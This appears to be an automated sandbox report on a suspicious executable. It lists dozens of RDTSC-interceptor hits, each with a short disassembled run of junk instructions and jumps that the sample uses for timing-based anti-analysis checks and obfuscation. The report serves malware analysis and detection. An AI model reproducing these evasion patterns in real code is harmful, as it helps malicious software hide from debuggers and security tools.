                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF49 second address: 52AF50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E8 second address: 52B0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0F0 second address: 52B0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0F6 second address: 52B116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8B146BE727h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B116 second address: 52B11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B431 second address: 52B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B43C second address: 52B444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52EFC7 second address: 52EFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50217B second address: 50217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502281 second address: 502285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502285 second address: 502302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B14C5BAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 mov di, E061h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+122D273Ch] 0x00000029 mov dword ptr [ebp+12493F4Ah], esp 0x0000002f add ecx, dword ptr [ebp+122D2AC9h] 0x00000035 cmp dword ptr [ebp+122D2A31h], 00000000h 0x0000003c jne 00007F8B14C5BB4Ah 0x00000042 sub dword ptr [ebp+1246A4F9h], edx 0x00000048 mov byte ptr [ebp+122D1E4Eh], 00000047h 0x0000004f adc edx, 595A6CC1h 0x00000055 mov eax, D49AA7D2h 0x0000005a add dword ptr [ebp+1245F710h], ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 je 00007F8B14C5BA98h 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50267B second address: 50267F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50267F second address: 502690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jbe 00007F8B14C5BA9Eh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502690 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dx, si 0x00000009 push dword ptr [ebp+122D0421h] 0x0000000f call dword ptr [ebp+122D1BC1h] 0x00000015 pushad 0x00000016 xor dword ptr [ebp+122D218Ch], ecx 0x0000001c xor eax, eax 0x0000001e jnl 00007F8B146BE725h 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 sub dword ptr [ebp+122D218Ch], edi 0x0000002e mov dword ptr [ebp+122D2B01h], eax 0x00000034 jns 00007F8B146BE71Fh 0x0000003a mov esi, 0000003Ch 0x0000003f sub dword ptr [ebp+122D218Ch], edi 0x00000045 sub dword ptr [ebp+122D218Ch], esi 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f add dword ptr [ebp+122D218Ch], ebx 0x00000055 lodsw 0x00000057 jnp 00007F8B146BE71Ch 0x0000005d mov dword ptr [ebp+122D19ADh], ebx 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jne 00007F8B146BE71Ch 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D218Ch], ebx 0x00000077 pushad 0x00000078 add dword ptr [ebp+122D19ADh], edx 0x0000007e add edx, 33F31554h 0x00000084 popad 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 pushad 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502709 second address: 50272B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ebx 0x00000008 jmp 00007F8B14C5BA9Fh 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50272B second address: 50276E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F8B146BE718h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 jmp 00007F8B146BE71Eh 0x00000026 mov di, A291h 0x0000002a mov di, A790h 0x0000002e push D01DDA7Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50276E second address: 502772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5028E1 second address: 502900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dword ptr [ebp+122D1ADDh], edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8B146BE71Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502900 second address: 502906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502906 second address: 50290A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5029CD second address: 502A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8B14C5BAA2h 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jo 00007F8B14C5BA9Ah 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [eax] 0x00000023 ja 00007F8B14C5BAA0h 0x00000029 pushad 0x0000002a jng 00007F8B14C5BA96h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a jmp 00007F8B14C5BAA0h 0x0000003f pop ecx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502C19 second address: 502C96 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F8B146BE726h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F8B146BE718h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c js 00007F8B146BE72Eh 0x00000032 jmp 00007F8B146BE728h 0x00000037 push 00000004h 0x00000039 mov dword ptr [ebp+122D26A5h], ecx 0x0000003f push eax 0x00000040 pushad 0x00000041 push ebx 0x00000042 jmp 00007F8B146BE71Dh 0x00000047 pop ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306A second address: 50306E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5031BA second address: 5031D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B146BE722h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F2BB second address: 52F2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F2BF second address: 52F2E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8B146BE71Eh 0x00000010 jmp 00007F8B146BE71Ah 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F2E5 second address: 52F2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8B14C5BA96h 0x00000009 jne 00007F8B14C5BA96h 0x0000000f popad 0x00000010 jng 00007F8B14C5BA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F5C2 second address: 52F604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE727h 0x00000007 jmp 00007F8B146BE728h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8B146BE71Bh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F604 second address: 52F612 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B14C5BA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F78E second address: 52F792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F792 second address: 52F796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F8FE second address: 52F905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F905 second address: 52F923 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B14C5BA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 je 00007F8B14C5BA96h 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FA78 second address: 52FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FA7C second address: 52FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FA80 second address: 52FA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FD33 second address: 52FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5356F6 second address: 535714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE724h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535714 second address: 53571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53571A second address: 53571E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53571E second address: 535736 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8B14C5BA9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5358CB second address: 5358CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5358CF second address: 5358EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8B14C5BA9Bh 0x0000000e jo 00007F8B14C5BA96h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5358EC second address: 535919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146BE729h 0x00000008 jo 00007F8B146BE716h 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535919 second address: 53591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D5B second address: 535D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BE71Fh 0x00000009 ja 00007F8B146BE716h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53542F second address: 535435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535435 second address: 53543F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B146BE716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53543F second address: 535443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5361CF second address: 5361D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536321 second address: 536325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536325 second address: 53634F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F8B146BE721h 0x0000000e jmp 00007F8B146BE71Bh 0x00000013 push esi 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F8B146BE716h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53634F second address: 536353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536353 second address: 536357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539EBF second address: 539EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539EC3 second address: 539ED1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539ED1 second address: 539ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79AC second address: 4B79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79B0 second address: 4B79B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B496 second address: 53B4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE71Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B4A6 second address: 53B4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0C90 second address: 4B0CA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8B146BE71Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0CA2 second address: 4B0CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8B14C5BAAAh 0x0000000a jmp 00007F8B14C5BAA2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E40F second address: 53E43D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8B146BE716h 0x00000008 ja 00007F8B146BE716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F8B146BE729h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544282 second address: 544286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544286 second address: 54428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54428C second address: 544291 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542E12 second address: 542E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542F7C second address: 542F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F8B14C5BA9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542F94 second address: 542F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54311A second address: 543120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54328D second address: 543297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8B146BE716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54354D second address: 543561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B14C5BA9Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543561 second address: 54357C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F8B146BE730h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F8B146BE716h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54357C second address: 543582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5436E2 second address: 5436E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5436E8 second address: 5436EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543846 second address: 54384A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5473EE second address: 54740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8B151F0E3Ch 0x0000000b jmp 00007F8B151F0E3Fh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54740F second address: 547428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8B146C0A0Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547428 second address: 54742D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54742D second address: 547433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A4F8 second address: 54A519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007F8B151F0E48h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A519 second address: 54A553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A18h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8B146C0A0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F8B146C0A06h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A553 second address: 54A563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54DC05 second address: 54DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54DC09 second address: 54DC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54DC0D second address: 54DC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5524B5 second address: 5524E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8B151F0E40h 0x00000012 rdtsc
